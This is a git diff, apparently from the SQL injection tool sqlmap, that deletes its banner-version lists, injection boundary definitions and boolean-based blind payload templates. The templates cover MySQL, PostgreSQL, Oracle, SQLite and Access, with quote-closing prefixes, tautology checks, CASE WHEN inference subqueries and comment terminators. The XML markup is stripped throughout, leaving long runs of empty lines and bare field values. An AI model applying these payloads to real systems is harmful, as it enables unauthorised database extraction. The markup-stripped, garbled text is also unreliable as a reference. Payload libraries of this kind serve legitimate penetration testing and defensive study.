- 2+Q322853
-
-
-
-
- 8.00.644
-
-
- 2+Q324186
-
-
-
-
- 8.00.608
-
-
- 2+Q319507
-
-
-
-
- 8.00.604
-
-
- 2+3
-
-
-
-
- 8.00.594
-
-
- 2+Q319477
-
-
-
-
- 8.00.578
-
-
- 2+Q317979
-
-
-
-
- 8.00.561
-
-
- 2+1
-
-
-
-
- 8.00.558
-
-
- 2+Q314003
-
-
-
-
- 8.00.552
-
-
- 2+Q313002
-
-
-
-
- 8.00.534
-
-
- 2.01
-
-
-
-
- 8.00.532
-
-
- 2
-
-
-
-
- 8.00.475
-
-
- 1+1
-
-
-
-
- 8.00.474
-
-
- 1+Q315395
-
-
-
-
- 8.00.473
-
-
- 1+Q314003
-
-
-
-
- 8.00.471
-
-
- 1+Q313302
-
-
-
-
- 8.00.469
-
-
- 1+Q313005
-
-
-
-
- 8.00.452
-
-
- 1+Q308547
-
-
-
-
- 8.00.444
-
-
- 1+Q307540
-
-
-
-
- 8.00.443
-
-
- 1+Q307538
-
-
-
-
- 8.00.428
-
-
- 1+Q304850
-
-
-
-
- 8.00.384
-
-
- 1
-
-
-
-
- 8.00.287
-
-
- 0+Q297209
-
-
-
-
- 8.00.251
-
-
- 0+Q300194
-
-
-
-
- 8.00.250
-
-
- 0+Q291683
-
-
-
-
- 8.00.249
-
-
- 0+Q288122
-
-
-
-
- 8.00.239
-
-
- 0+Q285290
-
-
-
-
- 8.00.233
-
-
- 0+Q282416
-
-
-
-
- 8.00.231
-
-
- 0+Q282279
-
-
-
-
- 8.00.226
-
-
- 0+Q278239
-
-
-
-
- 8.00.225
-
-
- 0+Q281663
-
-
-
-
- 8.00.223
-
-
- 0+Q280380
-
-
-
-
- 8.00.222
-
-
- 0+Q281769
-
-
-
-
- 8.00.218
-
-
- 0+Q279183
-
-
-
-
- 8.00.217
-
-
- 0+Q279293
-
-
-
-
- 8.00.211
-
-
- 0+Q276329
-
-
-
-
- 8.00.210
-
-
- 0+Q275900
-
-
-
-
- 8.00.205
-
-
- 0+Q274330
-
-
-
-
- 8.00.204
-
-
- 0+Q274329
-
-
-
-
- 8.00.194
-
-
- 0
-
-
-
-
- 8.00.190
-
-
- Gold, no
-
-
-
-
- 8.00.100
-
-
- Beta 2
-
-
-
-
- 8.00.078
-
-
- EAP5
-
-
-
-
- 8.00.047
-
-
- EAP4
-
-
-
-
diff --git a/data/xml/banner/mysql.xml b/data/xml/banner/mysql.xml
deleted file mode 100644
index 456c9510b82..00000000000
--- a/data/xml/banner/mysql.xml
+++ /dev/null
@@ -1,79 +0,0 @@
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
diff --git a/data/xml/banner/oracle.xml b/data/xml/banner/oracle.xml
deleted file mode 100644
index 61ce9948cf8..00000000000
--- a/data/xml/banner/oracle.xml
+++ /dev/null
@@ -1,7 +0,0 @@
-
-
-
-
-
-
-
diff --git a/data/xml/banner/postgresql.xml b/data/xml/banner/postgresql.xml
deleted file mode 100644
index 7f03e8e8c4a..00000000000
--- a/data/xml/banner/postgresql.xml
+++ /dev/null
@@ -1,16 +0,0 @@
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
diff --git a/data/xml/banner/server.xml b/data/xml/banner/server.xml
deleted file mode 100644
index 4d99cade0bd..00000000000
--- a/data/xml/banner/server.xml
+++ /dev/null
@@ -1,943 +0,0 @@
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
diff --git a/data/xml/banner/servlet-engine.xml b/data/xml/banner/servlet-engine.xml
deleted file mode 100644
index c34d9617e1b..00000000000
--- a/data/xml/banner/servlet-engine.xml
+++ /dev/null
@@ -1,29 +0,0 @@
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
diff --git a/data/xml/banner/set-cookie.xml b/data/xml/banner/set-cookie.xml
deleted file mode 100644
index 419a436445a..00000000000
--- a/data/xml/banner/set-cookie.xml
+++ /dev/null
@@ -1,93 +0,0 @@
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
diff --git a/data/xml/banner/sharepoint.xml b/data/xml/banner/sharepoint.xml
deleted file mode 100644
index fe3f7b7b1c6..00000000000
--- a/data/xml/banner/sharepoint.xml
+++ /dev/null
@@ -1,9 +0,0 @@
-
-
-
-
-
-
-
-
-
diff --git a/data/xml/banner/x-aspnet-version.xml b/data/xml/banner/x-aspnet-version.xml
deleted file mode 100644
index 5cabdc4cee5..00000000000
--- a/data/xml/banner/x-aspnet-version.xml
+++ /dev/null
@@ -1,9 +0,0 @@
-
-
-
-
-
-
-
-
-
diff --git a/data/xml/banner/x-powered-by.xml b/data/xml/banner/x-powered-by.xml
deleted file mode 100644
index 34ad03d18c2..00000000000
--- a/data/xml/banner/x-powered-by.xml
+++ /dev/null
@@ -1,65 +0,0 @@
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
diff --git a/data/xml/boundaries.xml b/data/xml/boundaries.xml
deleted file mode 100644
index 20bf0d10315..00000000000
--- a/data/xml/boundaries.xml
+++ /dev/null
@@ -1,576 +0,0 @@
-
-
-
-
-
-
-
- 3
- 1
- 1,2
- 1
- )
- [GENERIC_SQL_COMMENT]
-
-
-
- 4
- 1
- 1,2
- 2
- ')
- [GENERIC_SQL_COMMENT]
-
-
-
- 3
- 1,2,3
- 1,2
- 2
- '
- [GENERIC_SQL_COMMENT]
-
-
-
- 5
- 1
- 1,2
- 4
- "
- [GENERIC_SQL_COMMENT]
-
-
-
-
-
- 1
- 1
- 1,2
- 1
- )
- AND ([RANDNUM]=[RANDNUM]
-
-
-
- 2
- 1
- 1,2
- 1
- ))
- AND (([RANDNUM]=[RANDNUM]
-
-
-
- 3
- 1
- 1,2
- 1
- )))
- AND ((([RANDNUM]=[RANDNUM]
-
-
-
- 1
- 0
- 1,2,3
- 1
-
-
-
-
-
- 1
- 1
- 1,2
- 2
- ')
- AND ('[RANDSTR]'='[RANDSTR]
-
-
-
- 2
- 1
- 1,2
- 2
- '))
- AND (('[RANDSTR]'='[RANDSTR]
-
-
-
- 3
- 1
- 1,2
- 2
- ')))
- AND ((('[RANDSTR]'='[RANDSTR]
-
-
-
- 1
- 1
- 1,2
- 2
- '
- AND '[RANDSTR]'='[RANDSTR]
-
-
-
- 2
- 1
- 1,2
- 3
- ')
- AND ('[RANDSTR]' LIKE '[RANDSTR]
-
-
-
- 3
- 1
- 1,2
- 3
- '))
- AND (('[RANDSTR]' LIKE '[RANDSTR]
-
-
-
- 4
- 1
- 1,2
- 3
- ')))
- AND ((('[RANDSTR]' LIKE '[RANDSTR]
-
-
-
- 2
- 1
- 1,2
- 3
- %'
- AND '[RANDSTR]%'='[RANDSTR]
-
-
-
- 2
- 1
- 1,2
- 3
- '
- AND '[RANDSTR]' LIKE '[RANDSTR]
-
-
-
- 2
- 1
- 1,2
- 4
- ")
- AND ("[RANDSTR]"="[RANDSTR]
-
-
-
- 3
- 1
- 1,2
- 4
- "))
- AND (("[RANDSTR]"="[RANDSTR]
-
-
-
- 4
- 1
- 1,2
- 4
- ")))
- AND ((("[RANDSTR]"="[RANDSTR]
-
-
-
- 2
- 1
- 1,2
- 4
- "
- AND "[RANDSTR]"="[RANDSTR]
-
-
-
- 3
- 1
- 1,2
- 5
- ")
- AND ("[RANDSTR]" LIKE "[RANDSTR]
-
-
-
- 4
- 1
- 1,2
- 5
- "))
- AND (("[RANDSTR]" LIKE "[RANDSTR]
-
-
-
- 5
- 1
- 1,2
- 5
- ")))
- AND ((("[RANDSTR]" LIKE "[RANDSTR]
-
-
-
- 3
- 1
- 1,2
- 5
- "
- AND "[RANDSTR]" LIKE "[RANDSTR]
-
-
-
- 1
- 1
- 1,2
- 1
-
- [GENERIC_SQL_COMMENT]
-
-
-
- 3
- 1
- 1,2
- 1
-
- # [RANDSTR]
-
-
-
-
- 3
- 1
- 1,2
- 2
- '
- OR '[RANDSTR1]'='[RANDSTR2]
-
-
-
-
-
- 5
- 9
- 1,2
- 2
- ') WHERE [RANDNUM]=[RANDNUM]
- [GENERIC_SQL_COMMENT]
-
-
-
- 5
- 9
- 1,2
- 2
- ") WHERE [RANDNUM]=[RANDNUM]
- [GENERIC_SQL_COMMENT]
-
-
-
- 4
- 9
- 1,2
- 1
- ) WHERE [RANDNUM]=[RANDNUM]
- [GENERIC_SQL_COMMENT]
-
-
-
- 4
- 9
- 1,2
- 2
- ' WHERE [RANDNUM]=[RANDNUM]
- [GENERIC_SQL_COMMENT]
-
-
-
- 5
- 9
- 1,2
- 4
- " WHERE [RANDNUM]=[RANDNUM]
- [GENERIC_SQL_COMMENT]
-
-
-
- 4
- 9
- 1,2
- 1
- WHERE [RANDNUM]=[RANDNUM]
- [GENERIC_SQL_COMMENT]
-
-
-
- 5
- 9
- 1
- 2
- '||(SELECT '[RANDSTR]' WHERE [RANDNUM]=[RANDNUM]
- )||'
-
-
-
- 5
- 9
- 1
- 2
- '||(SELECT '[RANDSTR]' FROM DUAL WHERE [RANDNUM]=[RANDNUM]
- )||'
-
-
-
- 5
- 9
- 1
- 2
- '+(SELECT '[RANDSTR]' WHERE [RANDNUM]=[RANDNUM]
- )+'
-
-
-
- 5
- 9
- 1
- 2
- ||(SELECT '[RANDSTR]' FROM DUAL WHERE [RANDNUM]=[RANDNUM]
- )||
-
-
-
- 5
- 9
- 1
- 2
- ||(SELECT '[RANDSTR]' WHERE [RANDNUM]=[RANDNUM]
- )||
-
-
-
- 5
- 9
- 1
- 1
- +(SELECT [RANDSTR] WHERE [RANDNUM]=[RANDNUM]
- )+
-
-
-
- 5
- 9
- 1
- 2
- +(SELECT '[RANDSTR]' WHERE [RANDNUM]=[RANDNUM]
- )+
-
-
-
-
-
- 5
- 1
- 1,2
- 2
- ')) AS [RANDSTR] WHERE [RANDNUM]=[RANDNUM]
- [GENERIC_SQL_COMMENT]
-
-
-
- 5
- 1
- 1,2
- 2
- ")) AS [RANDSTR] WHERE [RANDNUM]=[RANDNUM]
- [GENERIC_SQL_COMMENT]
-
-
-
- 5
- 1
- 1,2
- 1
- )) AS [RANDSTR] WHERE [RANDNUM]=[RANDNUM]
- [GENERIC_SQL_COMMENT]
-
-
-
- 4
- 1
- 1,2
- 2
- ') AS [RANDSTR] WHERE [RANDNUM]=[RANDNUM]
- [GENERIC_SQL_COMMENT]
-
-
-
- 5
- 1
- 1,2
- 4
- ") AS [RANDSTR] WHERE [RANDNUM]=[RANDNUM]
- [GENERIC_SQL_COMMENT]
-
-
-
- 4
- 1
- 1,2
- 1
- ) AS [RANDSTR] WHERE [RANDNUM]=[RANDNUM]
- [GENERIC_SQL_COMMENT]
-
-
-
- 4
- 1
- 1
- 1
- ` WHERE [RANDNUM]=[RANDNUM]
- [GENERIC_SQL_COMMENT]
-
-
-
- 5
- 1
- 1
- 1
- `) WHERE [RANDNUM]=[RANDNUM]
- [GENERIC_SQL_COMMENT]
-
-
-
-
-
- 4
- 8
- 1
- 6
- `=`[ORIGINAL]`
- AND `[ORIGINAL]`=`[ORIGINAL]
-
-
-
- 5
- 8
- 1
- 6
- "="[ORIGINAL]"
- AND "[ORIGINAL]"="[ORIGINAL]
-
-
-
- 5
- 8
- 1
- 6
- ]-(SELECT 0 WHERE [RANDNUM]=[RANDNUM]
- )|[[ORIGINAL]
-
-
-
-
- 5
- 7
- 1
- 3
- [RANDSTR1],
- [RANDSTR2]
-
-
-
-
- 4
- 1
- 1
- 2
- ' IN BOOLEAN MODE)
- #
-
-
-
diff --git a/data/xml/errors.xml b/data/xml/errors.xml
deleted file mode 100644
index 74555d54ab3..00000000000
--- a/data/xml/errors.xml
+++ /dev/null
@@ -1,240 +0,0 @@
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
diff --git a/data/xml/payloads/boolean_blind.xml b/data/xml/payloads/boolean_blind.xml
deleted file mode 100644
index ae8b6de95f2..00000000000
--- a/data/xml/payloads/boolean_blind.xml
+++ /dev/null
@@ -1,1612 +0,0 @@
-
-
-
-
-
-
-
- AND boolean-based blind - WHERE or HAVING clause
- 1
- 1
- 1
- 1,8,9
- 1
- AND [INFERENCE]
-
- AND [RANDNUM]=[RANDNUM]
-
-
- AND [RANDNUM]=[RANDNUM1]
-
-
-
-
- OR boolean-based blind - WHERE or HAVING clause
- 1
- 1
- 3
- 1,9
- 2
- OR [INFERENCE]
-
- OR [RANDNUM]=[RANDNUM]
-
-
- OR [RANDNUM]=[RANDNUM1]
-
-
-
-
- OR boolean-based blind - WHERE or HAVING clause (NOT)
- 1
- 3
- 3
- 1,9
- 1
- OR NOT [INFERENCE]
-
- OR NOT [RANDNUM]=[RANDNUM]
-
-
- OR NOT [RANDNUM]=[RANDNUM1]
-
-
-
-
- AND boolean-based blind - WHERE or HAVING clause (subquery - comment)
- 1
- 2
- 1
- 1,8,9
- 1
- AND [RANDNUM]=(SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE (SELECT [RANDNUM1] UNION SELECT [RANDNUM2]) END))
-
- AND [RANDNUM]=(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE (SELECT [RANDNUM1] UNION SELECT [RANDNUM2]) END))
- [GENERIC_SQL_COMMENT]
-
-
- AND [RANDNUM]=(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE (SELECT [RANDNUM1] UNION SELECT [RANDNUM2]) END))
-
-
-
-
- OR boolean-based blind - WHERE or HAVING clause (subquery - comment)
- 1
- 2
- 3
- 1,9
- 2
- OR [RANDNUM]=(SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE (SELECT [RANDNUM1] UNION SELECT [RANDNUM2]) END))
-
- OR [RANDNUM]=(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE (SELECT [RANDNUM1] UNION SELECT [RANDNUM2]) END))
- [GENERIC_SQL_COMMENT]
-
-
- OR [RANDNUM]=(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE (SELECT [RANDNUM1] UNION SELECT [RANDNUM2]) END))
-
-
-
-
- AND boolean-based blind - WHERE or HAVING clause (comment)
- 1
- 2
- 1
- 1
- 1
- AND [INFERENCE]
-
- AND [RANDNUM]=[RANDNUM]
- [GENERIC_SQL_COMMENT]
-
-
- AND [RANDNUM]=[RANDNUM1]
-
-
-
-
- OR boolean-based blind - WHERE or HAVING clause (comment)
- 1
- 2
- 3
- 1
- 2
- OR [INFERENCE]
-
- OR [RANDNUM]=[RANDNUM]
- [GENERIC_SQL_COMMENT]
-
-
- OR [RANDNUM]=[RANDNUM1]
-
-
-
-
- OR boolean-based blind - WHERE or HAVING clause (NOT - comment)
- 1
- 4
- 3
- 1
- 1
- OR NOT [INFERENCE]
-
- OR NOT [RANDNUM]=[RANDNUM]
- [GENERIC_SQL_COMMENT]
-
-
- OR NOT [RANDNUM]=[RANDNUM1]
-
-
-
-
- AND boolean-based blind - WHERE or HAVING clause (MySQL comment)
- 1
- 3
- 1
- 1
- 1
- AND [INFERENCE]
-
- AND [RANDNUM]=[RANDNUM]
- #
-
-
- AND [RANDNUM]=[RANDNUM1]
-
-
- MySQL
-
-
-
-
- OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
- 1
- 3
- 3
- 1
- 2
- OR [INFERENCE]
-
- OR [RANDNUM]=[RANDNUM]
- #
-
-
- OR [RANDNUM]=[RANDNUM1]
-
-
- MySQL
-
-
-
-
- OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)
- 1
- 3
- 3
- 1
- 1
- OR NOT [INFERENCE]
-
- OR NOT [RANDNUM]=[RANDNUM]
- #
-
-
- OR NOT [RANDNUM]=[RANDNUM1]
-
-
- MySQL
-
-
-
-
- AND boolean-based blind - WHERE or HAVING clause (Microsoft Access comment)
- 1
- 3
- 1
- 1
- 1
- AND [INFERENCE]
-
- AND [RANDNUM]=[RANDNUM]
- %16
-
-
- AND [RANDNUM]=[RANDNUM1]
-
-
- Microsoft Access
-
-
-
-
- OR boolean-based blind - WHERE or HAVING clause (Microsoft Access comment)
- 1
- 3
- 3
- 1
- 2
- OR [INFERENCE]
-
- OR [RANDNUM]=[RANDNUM]
- %16
-
-
- OR [RANDNUM]=[RANDNUM1]
-
-
- Microsoft Access
-
-
-
-
- MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
- 1
- 2
- 1
- 1,2,3
- 1
- RLIKE (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE 0x28 END))
-
- RLIKE (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE 0x28 END))
-
-
- RLIKE (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE 0x28 END))
-
-
- MySQL
-
-
-
-
- MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)
- 1
- 3
- 1
- 1,2,3,8
- 1
- AND MAKE_SET([INFERENCE],[RANDNUM])
-
- AND MAKE_SET([RANDNUM]=[RANDNUM],[RANDNUM1])
-
-
- AND MAKE_SET([RANDNUM]=[RANDNUM1],[RANDNUM1])
-
-
- MySQL
-
-
-
-
- MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)
- 1
- 3
- 3
- 1,2,3
- 2
- OR MAKE_SET([INFERENCE],[RANDNUM])
-
- OR MAKE_SET([RANDNUM]=[RANDNUM],[RANDNUM1])
-
-
- OR MAKE_SET([RANDNUM]=[RANDNUM1],[RANDNUM1])
-
-
- MySQL
-
-
-
-
- MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (ELT)
- 1
- 4
- 1
- 1,2,3,8
- 1
- AND ELT([INFERENCE],[RANDNUM])
-
- AND ELT([RANDNUM]=[RANDNUM],[RANDNUM1])
-
-
- AND ELT([RANDNUM]=[RANDNUM1],[RANDNUM1])
-
-
- MySQL
-
-
-
-
- MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (ELT)
- 1
- 4
- 3
- 1,2,3
- 2
- OR ELT([INFERENCE],[RANDNUM])
-
- OR ELT([RANDNUM]=[RANDNUM],[RANDNUM1])
-
-
- OR ELT([RANDNUM]=[RANDNUM1],[RANDNUM1])
-
-
- MySQL
-
-
-
-
- MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
- 1
- 5
- 1
- 1,2,3,8
- 1
- AND EXTRACTVALUE([RANDNUM],CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE 0x3A END)
-
- AND EXTRACTVALUE([RANDNUM],CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE 0x3A END)
-
-
- AND EXTRACTVALUE([RANDNUM],CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE 0x3A END)
-
-
- MySQL
-
-
-
-
- MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
- 1
- 5
- 3
- 1,2,3,8
- 2
- OR EXTRACTVALUE([RANDNUM],CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE 0x3A END)
-
- OR EXTRACTVALUE([RANDNUM],CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE 0x3A END)
-
-
- OR EXTRACTVALUE([RANDNUM],CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE 0x3A END)
-
-
- MySQL
-
-
-
-
- PostgreSQL AND boolean-based blind - WHERE or HAVING clause (CAST)
- 1
- 2
- 1
- 1,8
- 1
- AND (SELECT (CASE WHEN ([INFERENCE]) THEN NULL ELSE CAST('[RANDSTR]' AS NUMERIC) END)) IS NULL
-
- AND (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN NULL ELSE CAST('[RANDSTR]' AS NUMERIC) END)) IS NULL
-
-
- AND (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN NULL ELSE CAST('[RANDSTR]' AS NUMERIC) END)) IS NULL
-
-
- PostgreSQL
-
-
-
-
- PostgreSQL OR boolean-based blind - WHERE or HAVING clause (CAST)
- 1
- 3
- 3
- 1
- 2
- OR (SELECT (CASE WHEN ([INFERENCE]) THEN NULL ELSE CAST('[RANDSTR]' AS NUMERIC) END)) IS NULL
-
- OR (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN NULL ELSE CAST('[RANDSTR]' AS NUMERIC) END)) IS NULL
-
-
- OR (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN NULL ELSE CAST('[RANDSTR]' AS NUMERIC) END)) IS NULL
-
-
- PostgreSQL
-
-
-
-
- Oracle AND boolean-based blind - WHERE or HAVING clause (CTXSYS.DRITHSX.SN)
- 1
- 2
- 1
- 1
- 1
- AND (SELECT (CASE WHEN ([INFERENCE]) THEN NULL ELSE CTXSYS.DRITHSX.SN(1,[RANDNUM]) END) FROM DUAL) IS NULL
-
- AND (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN NULL ELSE CTXSYS.DRITHSX.SN(1,[RANDNUM]) END) FROM DUAL) IS NULL
-
-
- AND (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN NULL ELSE CTXSYS.DRITHSX.SN(1,[RANDNUM]) END) FROM DUAL) IS NULL
-
-
- Oracle
-
-
-
-
- Oracle OR boolean-based blind - WHERE or HAVING clause (CTXSYS.DRITHSX.SN)
- 1
- 3
- 3
- 1
- 2
- OR (SELECT (CASE WHEN ([INFERENCE]) THEN NULL ELSE CTXSYS.DRITHSX.SN(1,[RANDNUM]) END) FROM DUAL) IS NULL
-
- OR (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN NULL ELSE CTXSYS.DRITHSX.SN(1,[RANDNUM]) END) FROM DUAL) IS NULL
-
-
- OR (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN NULL ELSE CTXSYS.DRITHSX.SN(1,[RANDNUM]) END) FROM DUAL) IS NULL
-
-
- Oracle
-
-
-
-
- SQLite AND boolean-based blind - WHERE, HAVING, GROUP BY or HAVING clause (JSON)
- 1
- 2
- 1
- 1
- 1
- AND CASE WHEN [INFERENCE] THEN [RANDNUM] ELSE JSON('[RANDSTR]') END
-
- AND CASE WHEN [RANDNUM]=[RANDNUM] THEN [RANDNUM] ELSE JSON('[RANDSTR]') END
-
-
- AND CASE WHEN [RANDNUM]=[RANDNUM1] THEN [RANDNUM] ELSE JSON('[RANDSTR]') END
-
-
- SQLite
-
-
-
-
- SQLite OR boolean-based blind - WHERE, HAVING, GROUP BY or HAVING clause (JSON)
- 1
- 3
- 3
- 1
- 2
- OR CASE WHEN [INFERENCE] THEN [RANDNUM] ELSE JSON('[RANDSTR]') END
-
- OR CASE WHEN [RANDNUM]=[RANDNUM] THEN [RANDNUM] ELSE JSON('[RANDSTR]') END
-
-
- OR CASE WHEN [RANDNUM]=[RANDNUM1] THEN [RANDNUM] ELSE JSON('[RANDSTR]') END
-
-
- SQLite
-
-
-
-
-
-
-
- Boolean-based blind - Parameter replace (original value)
- 1
- 1
- 1
- 1,2,3
- 3
- (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE (SELECT [RANDNUM1] UNION SELECT [RANDNUM2]) END))
-
- (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE (SELECT [RANDNUM1] UNION SELECT [RANDNUM2]) END))
-
-
- (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE (SELECT [RANDNUM1] UNION SELECT [RANDNUM2]) END))
-
-
-
-
- MySQL boolean-based blind - Parameter replace (MAKE_SET)
- 1
- 4
- 1
- 1,2,3
- 3
- MAKE_SET([INFERENCE],[RANDNUM])
-
- MAKE_SET([RANDNUM]=[RANDNUM],[RANDNUM1])
-
-
- MAKE_SET([RANDNUM]=[RANDNUM1],[RANDNUM1])
-
-
- MySQL
-
-
-
-
- MySQL boolean-based blind - Parameter replace (MAKE_SET - original value)
- 1
- 5
- 1
- 1,2,3
- 3
- MAKE_SET([INFERENCE],[ORIGVALUE])
-
- MAKE_SET([RANDNUM]=[RANDNUM],[ORIGVALUE])
-
-
- MAKE_SET([RANDNUM]=[RANDNUM1],[ORIGVALUE])
-
-
